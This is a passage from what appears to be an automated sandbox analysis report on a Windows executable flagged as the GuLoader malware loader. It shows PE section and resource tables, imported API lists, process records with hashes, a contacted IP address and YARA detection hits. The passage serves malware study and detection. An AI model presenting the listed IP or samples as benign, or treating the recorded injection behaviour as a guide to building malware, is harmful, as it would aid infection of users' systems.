              .rdata | 0x8000 | 0x1250 | 0x1400 | False | 0.430078125 | data | 5.041636133183931 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data | 0xa000 | 0x399058 | 0x400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .ndata | 0x3a4000 | 0x23000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc | 0x3c7000 | 0x37c28 | 0x37e00 | False | 0.4934109340044743 | data | 6.083319493650987 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              Name | RVA | Size | Type | Language | Country
              RT_ICON | 0x3c7460 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States
              RT_ICON | 0x3d7c88 | 0xd177 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
              RT_ICON | 0x3e4e00 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States
              RT_ICON | 0x3ee2a8 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States
              RT_ICON | 0x3f3730 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States
              RT_ICON | 0x3f7958 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
              RT_ICON | 0x3f9f00 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
              RT_ICON | 0x3fafa8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States
              RT_ICON | 0x3fbe50 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States
              RT_ICON | 0x3fc7d8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States
              RT_ICON | 0x3fd080 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States
              RT_ICON | 0x3fd6e8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States
              RT_ICON | 0x3fdc50 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
              RT_ICON | 0x3fe0b8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States
              RT_ICON | 0x3fe3a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States
              RT_DIALOG | 0x3fe4c8 | 0x100 | data | English | United States
              RT_DIALOG | 0x3fe5c8 | 0x11c | data | English | United States
              RT_DIALOG | 0x3fe6e8 | 0xc4 | data | English | United States
              RT_DIALOG | 0x3fe7b0 | 0x60 | data | English | United States
              RT_GROUP_ICON | 0x3fe810 | 0xd8 | data | English | United States
              RT_MANIFEST | 0x3fe8e8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States
              DLL | Import
              KERNEL32.dll | GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
              USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
              GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
              SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
              ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
              COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
              ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
              Language of compilation system | Country where language is spoken
              English | United States
              TCP Packets: Timestamp | Source Port | Dest Port | Source IP | Dest IP
              • 37.139.128.83


              Target ID:2
              Start time:13:15:59
              Start date:20/03/2023
              Path:C:\Users\user\Desktop\download.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\download.exe
              Imagebase:0x400000
              File size:680560 bytes
              MD5 hash:064FA36DA0C2CA360B0906CC5BFE67C6
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000002.00000002.1798739196.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1806817167.00000000069EF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low

              Target ID:4
              Start time:13:16:37
              Start date:20/03/2023
              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\download.exe
              Imagebase:0x10000
              File size:106496 bytes
              MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.5807012371.00000000025EF000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              Reputation:moderate

              Target ID:5
              Start time:13:16:37
              Start date:20/03/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7d7f70000
              File size:875008 bytes
              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
